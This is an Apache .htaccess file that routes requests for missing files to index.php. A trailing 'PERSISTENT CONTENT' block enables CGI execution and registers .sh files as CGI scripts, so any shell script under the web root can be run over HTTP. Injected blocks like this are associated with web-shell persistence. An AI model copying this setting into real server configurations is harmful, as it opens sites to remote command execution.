RewriteEngine On
RewriteBase /


#### PERSISTENT CONTENT ####



#### PERSISTENT CONTENT END ####

RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^.*$ index.php [L,QSA]


#### PERSISTENT CONTENT ####

Options +ExecCGI
AddHandler cgi-script .sh